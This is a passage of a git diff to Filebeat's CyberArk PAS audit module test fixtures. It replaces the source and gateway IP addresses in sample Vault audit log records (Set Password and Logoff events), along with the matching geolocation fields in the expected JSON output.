-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 05:57:25</Timestamp>\n    <IsoTimestamp>2021-03-14T12:57:25Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>88</MessageID>\n    <Desc>Set Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMPApp_SSH</Issuer>\n    <Action>Set Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Set Password</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 05:57:25</Timestamp>\n    <IsoTimestamp>2021-03-14T12:57:25Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>88</MessageID>\n    <Desc>Set Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMPApp_SSH</Issuer>\n    <Action>Set Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Set Password</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "34.71.250.247",
+        "cyberarkpas.audit.station": "81.2.69.143",
         "cyberarkpas.audit.timestamp": "Mar 14 05:57:25",
         "event.action": "set password",
         "event.code": "88",
@@ -712,23 +691,26 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 12310,
+        "log.offset": 12291,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "34.71.250.247"
+            "81.2.69.143"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "34.71.250.247",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
-        "source.ip": "34.71.250.247",
+        "source.address": "81.2.69.143",
+        "source.geo.city_name": "London",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -741,10 +723,10 @@
         "cyberarkpas.audit.iso_timestamp": "2021-03-14T12:57:25Z",
         "cyberarkpas.audit.issuer": "PSMP_ADB_asr-cyberark-psm-ssh",
         "cyberarkpas.audit.message": "Set Password",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 05:57:25</Timestamp>\n    <IsoTimestamp>2021-03-14T12:57:25Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>88</MessageID>\n    <Desc>Set Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMP_ADB_asr-cyberark-psm-ssh</Issuer>\n    <Action>Set Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Set Password</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 05:57:25</Timestamp>\n    <IsoTimestamp>2021-03-14T12:57:25Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>88</MessageID>\n    <Desc>Set Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMP_ADB_asr-cyberark-psm-ssh</Issuer>\n    <Action>Set Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Set Password</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "34.71.250.247",
+        "cyberarkpas.audit.station": "81.2.69.143",
         "cyberarkpas.audit.timestamp": "Mar 14 05:57:25",
         "event.action": "set password",
         "event.code": "88",
@@ -756,23 +738,26 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 13712,
+        "log.offset": 13689,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "34.71.250.247"
+            "81.2.69.143"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "34.71.250.247",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
-        "source.ip": "34.71.250.247",
+        "source.address": "81.2.69.143",
+        "source.geo.city_name": "London",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/8_logoff.log b/x-pack/filebeat/module/cyberarkpas/audit/test/8_logoff.log
index 55eeab9c1a71..1879666bfeda 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/8_logoff.log
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/8_logoff.log
@@ -4,12 +4,12 @@
 <5>1 2021-03-10T08:28:29Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 00:28:29","IsoTimestamp":"2021-03-10T08:28:29Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Prov_COMPONENTS","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}}
 <5>1 2021-03-10T08:28:30Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 00:28:30","IsoTimestamp":"2021-03-10T08:28:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"PVWAGWUser","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}}
 <5>1 2021-03-10T08:28:30Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 00:28:30","IsoTimestamp":"2021-03-10T08:28:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"PVWAAppUser","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:33Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:33","IsoTimestamp":"2021-03-10T09:11:33Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}}
-<5>1 2021-03-10T09:12:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:12:20","IsoTimestamp":"2021-03-10T09:12:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"PSMP_ADB_localhost.localdomain","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}}
-<5>1 2021-03-10T09:12:27Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:12:27","IsoTimestamp":"2021-03-10T09:12:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"PSMPGW_localhost.localdomain","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}}
-<5>1 2021-03-10T22:17:27Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:27","IsoTimestamp":"2021-03-10T22:17:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}}
-<5>1 2021-03-11T17:38:13Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:38:13</Timestamp>\n    <IsoTimestamp>2021-03-11T17:38:13Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>8</MessageID>\n    <Desc>Logoff</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Logoff</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>127.0.0.1</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Logoff</Message>\n    <GatewayStation>81.32.170.205</GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:13","IsoTimestamp":"2021-03-11T17:38:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":"81.32.170.205"}}}
-<5>1 2021-03-11T17:48:28Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:48:28</Timestamp>\n    <IsoTimestamp>2021-03-11T17:48:28Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>8</MessageID>\n    <Desc>Logoff</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Logoff</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>10.0.2.2</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Logoff</Message>\n    <GatewayStation>81.32.170.205</GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:48:28","IsoTimestamp":"2021-03-11T17:48:28Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":"81.32.170.205"}}}
-<5>1 2021-03-11T17:49:06Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:49:06</Timestamp>\n    <IsoTimestamp>2021-03-11T17:49:06Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>8</MessageID>\n    <Desc>Logoff</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMPGW_VAGRANT</Issuer>\n    <Action>Logoff</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Logoff</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:49:06","IsoTimestamp":"2021-03-11T17:49:06Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"PSMPGW_VAGRANT","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}}
-<5>1 2021-03-14T12:57:20Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 05:57:20</Timestamp>\n    <IsoTimestamp>2021-03-14T12:57:20Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>8</MessageID>\n    <Desc>Logoff</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Logoff</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Logoff</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:20","IsoTimestamp":"2021-03-14T12:57:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}}
-<5>1 2021-03-14T13:49:36Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 06:49:36</Timestamp>\n    <IsoTimestamp>2021-03-14T13:49:36Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>8</MessageID>\n    <Desc>Logoff</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Logoff</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Logoff</Message>\n    <GatewayStation>34.71.250.247</GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:36","IsoTimestamp":"2021-03-14T13:49:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":"34.71.250.247"}}}
+<5>1 2021-03-10T09:11:33Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:33","IsoTimestamp":"2021-03-10T09:11:33Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}}
+<5>1 2021-03-10T09:12:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:12:20","IsoTimestamp":"2021-03-10T09:12:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"PSMP_ADB_localhost.localdomain","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}}
+<5>1 2021-03-10T09:12:27Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:12:27","IsoTimestamp":"2021-03-10T09:12:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"PSMPGW_localhost.localdomain","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}}
+<5>1 2021-03-10T22:17:27Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:27","IsoTimestamp":"2021-03-10T22:17:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.12","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}}
+<5>1 2021-03-11T17:38:13Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:38:13</Timestamp>\n    <IsoTimestamp>2021-03-11T17:38:13Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>8</MessageID>\n    <Desc>Logoff</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Logoff</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>127.0.0.1</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Logoff</Message>\n    <GatewayStation>67.43.156.14</GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:13","IsoTimestamp":"2021-03-11T17:38:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":"67.43.156.14"}}}
+<5>1 2021-03-11T17:48:28Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:48:28</Timestamp>\n    <IsoTimestamp>2021-03-11T17:48:28Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>8</MessageID>\n    <Desc>Logoff</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Logoff</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>10.0.2.2</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Logoff</Message>\n    <GatewayStation>67.43.156.14</GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:48:28","IsoTimestamp":"2021-03-11T17:48:28Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":"67.43.156.14"}}}
+<5>1 2021-03-11T17:49:06Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:49:06</Timestamp>\n    <IsoTimestamp>2021-03-11T17:49:06Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>8</MessageID>\n    <Desc>Logoff</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMPGW_VAGRANT</Issuer>\n    <Action>Logoff</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Logoff</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:49:06","IsoTimestamp":"2021-03-11T17:49:06Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"PSMPGW_VAGRANT","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}}
+<5>1 2021-03-14T12:57:20Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 05:57:20</Timestamp>\n    <IsoTimestamp>2021-03-14T12:57:20Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>8</MessageID>\n    <Desc>Logoff</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Logoff</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Logoff</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:20","IsoTimestamp":"2021-03-14T12:57:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}}
+<5>1 2021-03-14T13:49:36Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 06:49:36</Timestamp>\n    <IsoTimestamp>2021-03-14T13:49:36Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>8</MessageID>\n    <Desc>Logoff</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Logoff</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Logoff</Message>\n    <GatewayStation>81.2.69.143</GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:36","IsoTimestamp":"2021-03-14T13:49:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":"81.2.69.143"}}}
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/8_logoff.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/8_logoff.log-expected.json
index bc2ba6b62db8..6221aee5c510 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/8_logoff.log-expected.json
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/8_logoff.log-expected.json
@@ -308,7 +308,7 @@
         "cyberarkpas.audit.message": "Logoff",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 01:11:33",
         "event.action": "logoff",
         "event.category": [
@@ -335,22 +335,19 @@
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "Administrator"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
